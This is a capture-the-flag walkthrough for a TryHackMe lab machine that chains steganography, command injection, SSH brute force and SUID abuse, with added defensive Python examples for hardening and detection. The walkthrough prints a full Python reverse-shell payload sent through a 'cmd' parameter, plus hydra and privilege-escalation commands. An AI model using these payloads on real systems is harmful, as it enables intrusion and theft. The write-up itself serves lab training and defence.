Hello. I’m Rahmos. Here is my Jack-of-All-Trades — TryHackMe — WriteUp. Check it out!
First, deploy the machine and run nmap to find the open ports.
nmap -A -T4 -p- <ip>
Well, there is something tricky here. Normally port 22 is SSH and port 80 is HTTP, but on this machine it's the other way round.
So let's access the website on port 22. Firefox will block the request at first, because 22 is not a normal web server port. Follow these steps to allow port 22 in Firefox:
1/ Type about:config in your address bar
2/ Right click -> New -> String
3/ Enter this name: network.security.ports.banned.override
4/ Enter port 22 and save
The setting will look like this:
From now on, you can override any blocked port by changing this string to the port you want to access.
Now let’s get back to the website.
It’s always useful to check the page source. Press Ctrl+U to view page source.
Well, you can see there are 4 things to focus on: 3 images, a hidden directory, and an encoded string.
First let’s see what’s inside the hidden folder: /recovery.php
Well it’s a login page. I guess the username is jack and the password is the encoded string above. Let’s use icyberchef.com to decode that string.
So it’s encoded with Base64. Now I have the password: u?WtKSraq
I tried to log in with jack and that password, but it didn't work. So let's find another way.
It’s time for some stego. Download those 3 images and look for hidden data.
I will use steghide to extract the hidden data.
steghide extract -sf stego.jpg
Enter the password above and you will see the hidden data.
I couldn't extract any hidden data from jackinthebox.jpg with that password, so just skip it. Let's see what's inside creds.txt.
Uh-oh!! 😣 That means we need to extract data inside another image.
There is only 1 image left, which is header.jpg.
steghide extract -sf header.jpg
Use the same password as above.
Read the content of this hidden data.
Finally we have the credentials! Let's log in to the /recovery.php page.
It tells us to give it a 'cmd' parameter, which means command injection.
First let's try ls to list the files inside the home folder. Add ?cmd=ls+/home to the end of the URL.
Well it worked. So let’s spawn a reverse shell.
Start a listener on your machine.
nc -lvnp 4444
Change the cmd:
?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("your_host_ip",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
*Remember to change your_host_ip to your own IP.
Now you have a shell back on your machine.
cd to the home folder and cat the contents of jacks_password_list.
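Before going on, it is worth seeing why ?cmd= worked at all. The pattern behind /recovery.php is a user-supplied string handed to a shell. This is an added example written for this writeup, not the room's own source: run_cmd_vulnerable reproduces the weak pattern, and build_argv / run_cmd_hardened show the fix (no shell, a fixed allow-list of actions, and the only user-controlled value validated as a plain path confined to one directory). All function names and the allow-list are my own.

```python
import os
import subprocess

# Added example: a user-supplied "cmd" value passed straight to a shell.
# This is the weak pattern that lets ?cmd=ls+/home run on the target.
def run_cmd_vulnerable(cmd: str) -> str:
    # shell=True hands the whole string to /bin/sh, so ";", "|", "$(...)" and
    # friends are interpreted and any command the web user can run is reachable.
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

# Hardened form: fixed argv prefixes, no shell, and one validated path argument.
ALLOWED_ACTIONS = {
    "list": ["ls", "-l", "--"],
    "disk": ["df", "-h", "--"],
}
BASE_DIR = "/home"  # the only directory the handler may operate on (assumption)

def build_argv(action: str, path: str) -> list[str]:
    """Map an (action, path) request to an argv list, or raise ValueError."""
    if action not in ALLOWED_ACTIONS:
        raise ValueError(f"unknown action: {action!r}")
    # Refuse (rather than escape) anything that is not a simple path:
    # shell metacharacters, quotes, whitespace and NUL are all rejected.
    if not path or any(ch in path for ch in ";|&$`\"'<>\\\n\r\0 \t"):
        raise ValueError("path contains disallowed characters")
    # Canonicalise and confine to BASE_DIR, which defeats ../ traversal.
    real = os.path.normpath(os.path.join(BASE_DIR, path.lstrip("/")))
    if real != BASE_DIR and not real.startswith(BASE_DIR + os.sep):
        raise ValueError("path escapes base directory")
    return ALLOWED_ACTIONS[action] + [real]

def run_cmd_hardened(action: str, path: str) -> str:
    """Run the allow-listed action without a shell; the path can never become a command."""
    argv = build_argv(action, path)
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout

if __name__ == "__main__":
    print(build_argv("list", "jack"))  # ['ls', '-l', '--', '/home/jack']
    for bad in ("jack; id", "../../root", "$(id)"):
        try:
            build_argv("list", bad)
        except ValueError as err:
            print(f"rejected {bad!r}: {err}")
```

The key design choice is that the hardened handler never builds a command string: the action selects a fixed argv prefix and the path is appended as a single argument, so the input that worked against /recovery.php is rejected before anything is executed.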
It's a password list for user jack to access SSH. Let's brute-force it using hydra. Copy the password list to a txt file.
hydra -l jack -P jack.txt ssh://<ip>:80
*I named the file jack.txt, so remember to change it to your file's name.
Now I've found the valid password. Let's SSH into the machine.
ssh jack@<machine_ip> -p 80
Enter the password and we’re in!
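From the defender's side, the hydra run above leaves a very recognisable trace in sshd's log: a burst of "Failed password" lines from one source IP, followed by an "Accepted password" once the list hits the right entry. The following is an added example (not part of the original writeup) that parses syslog-style auth.log lines and flags source IPs with a burst of failures inside a short window, reporting whether a login succeeded after the burst. The log lines are constructed sample data, and the threshold and window are my own choices.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample sshd lines in auth.log format (not taken from the room).
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 host sshd[1201]: Failed password for jack from 10.10.14.7 port 51000 ssh2
Mar  3 10:15:01 host sshd[1202]: Failed password for jack from 10.10.14.7 port 51001 ssh2
Mar  3 10:15:02 host sshd[1203]: Failed password for jack from 10.10.14.7 port 51002 ssh2
Mar  3 10:15:02 host sshd[1204]: Failed password for invalid user admin from 10.10.14.7 port 51003 ssh2
Mar  3 10:15:03 host sshd[1205]: Failed password for jack from 10.10.14.7 port 51004 ssh2
Mar  3 10:15:03 host sshd[1206]: Failed password for jack from 10.10.14.7 port 51005 ssh2
Mar  3 10:15:04 host sshd[1207]: Accepted password for jack from 10.10.14.7 port 51006 ssh2
Mar  3 10:40:10 host sshd[1300]: Failed password for jack from 192.168.1.20 port 40001 ssh2
Mar  3 11:02:55 host sshd[1301]: Accepted publickey for jack from 192.168.1.20 port 40002 ssh2
"""

# Matches both successful and failed password/publickey events from OpenSSH.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$"
)

def parse_auth_log(text: str, year: int = 2024) -> list[dict]:
    """Turn auth.log text into event dicts; syslog lines carry no year, so one is supplied."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated sshd/PAM lines are ignored
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]})
    return events

def find_bruteforce(events: list[dict], threshold: int = 5, window_seconds: int = 60) -> dict:
    """Return {ip: {...}} for every source IP with >= threshold failures inside one window."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    alerts = {}
    for ip, evs in by_ip.items():
        fails = sorted(e["ts"] for e in evs if e["result"] == "Failed")
        burst = False
        lo = 0
        # Sliding window over the sorted failure timestamps.
        for hi in range(len(fails)):
            while (fails[hi] - fails[lo]).total_seconds() > window_seconds:
                lo += 1
            if hi - lo + 1 >= threshold:
                burst = True
                break
        if burst:
            # A success at or after the last failure is the sign the guess worked.
            success_after = any(e["result"] == "Accepted" and e["ts"] >= fails[-1] for e in evs)
            alerts[ip] = {"failures": len(fails), "success_after_burst": success_after}
    return alerts

if __name__ == "__main__":
    for ip, info in find_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(ip, info)
```

On the sample data only 10.10.14.7 is flagged: six failures in a few seconds and then an accepted password, which is exactly the shape a successful dictionary attack leaves behind. A single failure from 192.168.1.20 followed by a key-based login stays below the threshold. Moving sshd to port 80, as this machine does, changes nothing about these log lines, so port-based obscurity is no substitute for this kind of monitoring or for fail2ban-style lockouts.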
Now cd to jack's home directory and list the files.
There is a user.jpg inside, and it holds our first flag. Copy this image to your machine using scp.
scp -P 80 jack@<machine_ip>:/home/jack/user.jpg /your_home_folder
Enter jack's password and the picture will be transferred to your machine.
Open the image and get your first flag.
Now let’s get root to get the final flag inside /root folder.
First try sudo -l to see if Jack can run sudo on this machine.
Unfortunately, no! So let's try another way. Use find to search for binaries with the SUID bit set.
find / -perm -u=s 2>/dev/null
Well, there is the strings command. Because it runs with the owner's privileges, we can use it to read /root/root.txt.
First declare LFILE=/root/root.txt, then run strings on $LFILE.
Now get your final flag!
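The root step only works because a general-purpose binary (strings) has been given the SUID bit, which no stock distribution does. The added example below, which is not part of the original writeup, is the check an administrator would run: it compares a list of SUID files (in the format the find command above produces) against a baseline of binaries that are expected to be SUID and reports the outliers. The baseline and the sample find output are constructed for illustration; a real baseline should be taken from a known-good image of the same distribution.

```python
import os
import stat

# Constructed baseline of SUID binaries commonly expected on a Debian/Ubuntu-style
# host. Illustrative only: generate the real one from a clean install.
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/newgrp", "/usr/bin/gpasswd", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/pkexec",
}

# Constructed sample of `find / -perm -u=s -type f 2>/dev/null` output.
SAMPLE_FIND_OUTPUT = """\
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/strings
/usr/bin/mount
/usr/bin/umount
/usr/bin/su
"""

def parse_find_output(text: str) -> list[str]:
    """One path per line, blank lines dropped."""
    return [line.strip() for line in text.splitlines() if line.strip()]

def unexpected_suid(paths, expected=EXPECTED_SUID) -> list[str]:
    """SUID files that are not in the baseline, sorted for stable reporting."""
    return sorted(p for p in paths if p not in expected)

def scan_suid(root: str = "/") -> list[str]:
    """Live equivalent of the find command: regular files with S_ISUID set under root."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        if dirpath.startswith(("/proc", "/sys", "/dev")):
            dirnames[:] = []  # pseudo-filesystems are noise here
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat so symlinks are not followed
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return found

if __name__ == "__main__":
    # Offline check against the constructed find output; swap in scan_suid() on a real host.
    for path in unexpected_suid(parse_find_output(SAMPLE_FIND_OUTPUT)):
        print("unexpected SUID binary:", path)  # prints /usr/bin/strings
```

On the sample data the only outlier is /usr/bin/strings, which is precisely the binary the walkthrough abuses. The fix on a real system is to clear the bit (chmod u-s) on anything that is not in the baseline and to re-run the comparison on a schedule, since a stray SUID bit is one of the most common paths from a low-privileged shell to root.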